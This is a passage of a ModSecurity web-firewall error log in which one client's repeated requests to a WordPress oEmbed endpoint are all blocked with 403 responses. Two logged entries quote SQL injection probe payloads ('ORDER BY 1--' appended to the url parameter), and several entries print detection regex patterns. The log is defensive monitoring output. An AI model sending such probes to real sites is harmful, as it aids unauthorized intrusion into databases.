"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rXxeJlWfH1pdny5XJQAAAM4"] [Thu Aug 15 03:22:06.254162 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:56762] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rnxeJlWfH1pdny5XJgAAAMA"] [Thu Aug 15 03:22:06.686526 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:56764] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rnxeJlWfH1pdny5XJwAAAMw"] [Thu Aug 15 03:22:07.126067 2024] [:error] [pid 31337:tid 139653915064064] [client 141.98.81.52:56766] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26r-wCyyCVFXh0DMS2ewAAAIo"] [Thu Aug 15 03:22:07.578929 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:56770] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26r3xeJlWfH1pdny5XKAAAAMg"] [Thu Aug 15 03:22:07.980146 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:56772] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26r3xeJlWfH1pdny5XKQAAAM8"] [Thu Aug 15 03:22:08.427614 2024] [:error] [pid 31335:tid 139653839529728] [client 141.98.81.52:56774] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26sG0MD5oChETZltkVSQAAABM"] [Thu Aug 15 03:22:08.795901 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:56776] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26sHxeJlWfH1pdny5XKgAAAMk"] [Thu Aug 15 03:22:09.224494 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:56778] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26sXxeJlWfH1pdny5XKwAAANg"] [Thu Aug 15 03:22:09.815504 2024] [:error] [pid 31336:tid 139653889885952] [client 141.98.81.52:56780] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26sUPAyXqJhbW53WyPRgAAAE0"] [Thu Aug 15 03:22:10.159912 2024] [:error] [pid 31336:tid 139653814351616] [client 141.98.81.52:56782] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26skPAyXqJhbW53WyPRwAAAFY"] [Thu Aug 15 03:22:10.544322 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:56784] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/%' ORDER BY 1-- crOK"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26snxeJlWfH1pdny5XLAAAAMs"] [Thu Aug 15 03:22:11.072454 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:56786] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26s3xeJlWfH1pdny5XLQAAAM0"] [Thu Aug 15 03:22:11.584546 2024] [:error] [pid 31336:tid 139653831137024] [client 141.98.81.52:56788] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26s0PAyXqJhbW53WyPSAAAAFQ"] [Thu Aug 15 03:22:12.046430 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:56790] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tHxeJlWfH1pdny5XLgAAAMI"] [Thu Aug 15 03:22:12.531477 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:56792] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tOwCyyCVFXh0DMS2fAAAAIU"] [Thu Aug 15 03:22:13.088962 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56794] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tXxeJlWfH1pdny5XLwAAAME"] [Thu Aug 15 03:22:13.560720 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:56796] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tXxeJlWfH1pdny5XMAAAAMc"] [Thu Aug 15 03:22:13.946398 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:56798] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tXxeJlWfH1pdny5XMQAAAMM"] [Thu Aug 15 03:22:14.392097 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:56800] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tnxeJlWfH1pdny5XMgAAANM"] [Thu Aug 15 03:22:14.804766 2024] [:error] [pid 31335:tid 139653805958912] [client 141.98.81.52:56802] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26tm0MD5oChETZltkVSgAAABc"] [Thu Aug 15 03:22:15.253377 2024] [:error] [pid 31335:tid 139653814351616] [client 141.98.81.52:56804] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26t20MD5oChETZltkVSwAAABY"] [Thu Aug 15 03:22:15.735062 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56806] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/ ORDER BY 1-- hKjd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26t3xeJlWfH1pdny5XMwAAANc"] [Thu Aug 15 03:22:16.137349 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:56808] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26uHxeJlWfH1pdny5XNAAAAMo"] [Thu Aug 15 03:22:16.580390 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56810] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26uHxeJlWfH1pdny5XNQAAANI"] [Thu Aug 15 03:22:17.108093 2024] [:error] [pid 31337:tid 139653923456768] [client 141.98.81.52:56812] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26uewCyyCVFXh0DMS2fQAAAIk"] [Thu Aug 15 03:22:17.613212 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:56814] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26uXxeJlWfH1pdny5XNgAAANA"] [Thu Aug 15 03:22:18.137020 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:56816] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26unxeJlWfH1pdny5XNwAAAMw"] [Thu Aug 15 03:22:18.657523 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:56818] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26unxeJlWfH1pdny5XOAAAAMg"] [Thu Aug 15 03:22:19.124820 2024] [:error] [pid 31336:tid 139653948634880] [client 141.98.81.52:56820] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26u0PAyXqJhbW53WyPSQAAAEY"] [Thu Aug 15 03:22:19.565287 2024] [:error] [pid 31335:tid 139654049679104] [client 141.98.81.52:56824] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26u20MD5oChETZltkVTAAAAAI"] [Thu Aug 15 03:22:20.127424 2024] [:error] [pid 31336:tid 139654049679104] [client 141.98.81.52:56826] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 